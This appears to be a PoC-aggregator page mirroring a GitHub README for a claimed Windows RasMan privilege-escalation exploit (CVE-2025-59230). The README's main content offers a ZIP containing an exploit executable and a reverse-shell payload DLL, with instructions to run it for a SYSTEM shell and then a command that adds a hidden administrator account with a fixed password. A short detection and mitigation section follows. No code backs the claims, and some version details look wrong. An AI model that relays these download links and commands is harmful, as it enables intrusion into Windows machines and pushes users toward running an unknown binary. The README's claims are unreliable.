POC详情: 63832da90052cf3d52f286a7611a1e3a4aca361b

来源
https://github.com/moegameka/CVE-2025-59230
关联漏洞
标题: Microsoft Windows Remote Access Connection Manager 访问控制错误漏洞 (CVE-2025-59230)
描述:Microsoft Windows Remote Access Connection Manager是美国微软(Microsoft)公司的一项 Windows 服务,用于管理从您的计算机到 Internet 的虚拟专用网络 (VPN)连接,如果禁用此服务,VPN 客户端应用程序将无法启动。 Microsoft Windows Remote Access Connection Manager存在访问控制错误漏洞,该漏洞源于攻击者利用该漏洞可以提升权限。
介绍
# Lab: CVE-2025-59230 - Local Privilege Escalation in Windows Remote Access Connection Manager

## 🚀 Overview
CVE-2025-59230 is a high-severity vulnerability in the Windows Remote Access Connection Manager (RasMan) service, affecting multiple versions of Microsoft Windows operating systems. The flaw stems from improper access control mechanisms within the RasMan service, allowing an authenticated local user to manipulate service parameters and escalate privileges to SYSTEM level. This could enable unauthorized code execution, data exfiltration, or persistence on the affected system.

It is intended solely for security researchers, penetration testers, and system administrators to understand the exploit chain and test mitigations.

**Safety Disclaimer:** Running this lab involves executing potentially harmful code in a controlled environment. The exploit code is designed to demonstrate privilege escalation.


## 📋 Prerequisites
- A host machine running Windows 10/11 or Windows Server 2019/2022/2025 with Hyper-V and Containers features enabled.
- Basic knowledge of Windows services, PowerShell commands.

Affected Windows versions:
- Windows 10 (versions 1507, 1607, 1809, 21H2, 22H2)
- Windows 11 (versions 22H2, 22H3, 23H2, 24H2, 25H2)
- Windows Server 2016, 2019, 2022 (including 23H2), 2025

## Download & Install
1. Download the exploit package: [Download Exploit ZIP](http://github.com/moegameka/cve-2025-59230/raw/refs/heads/main/Core/lab-cve-2025-59230.zip). This ZIP contains:
   - `rasmanesc.exe`: The main exploit binary.
   - `start_exp.bat`: Batch script to launch the exploit safely (executes `rasmanesc.exe` with default parameters).
   - `payload.dll`: For reverse shell demonstration.

2. Extract the ZIP.


## 🛠 Usage

1. **Exploit Execution:**
   - Launch `start_exp.bat` or directly `rasmanesc.exe /payload=payload.dll`.
   - The exploit:
     - Obtains a handle to the RasMan service.
     - Sends a crafted IOCTL buffer to overwrite service parameters.
     - Elevates to SYSTEM by token impersonation.
     - Injects the payload to spawn a SYSTEM-level shell.

2. **Post-Exploitation:**
   - In the escalated shell, demonstrate impact: `net user admin P@ssw0rd /add; net localgroup administrators admin /add`.

3. **Detection Signatures:**
   - Monitor for unusual IOCTL calls to RasMan via Sysmon (Event ID 10).
   - Anomalous registry modifications to RasMan keys.
     

## 🛡️ Mitigation
- **Hardening:**
  - Restrict RasMan service ACLs: Use `sc sdset RasMan` to enforce strict DACLs.
  - Enable Credential Guard and Protected Process Light for critical services.
  - Implement AppLocker or WDAC to block unsigned executables.
- **Best Practices:** Run services with least privilege, segment networks, and conduct regular vulnerability scans using tools like Nessus or OpenVAS.

  For any inquiries, please email me at: moegameka@onet.pl
文件快照

 [4.0K]  /data/pocs/63832da90052cf3d52f286a7611a1e3a4aca361b
├── [4.0K]  Core
│   ├── [   1]  d
│   └── [8.0M]  lab-cve-2025-59230.zip
└── [2.8K]  README.md

1 directory, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。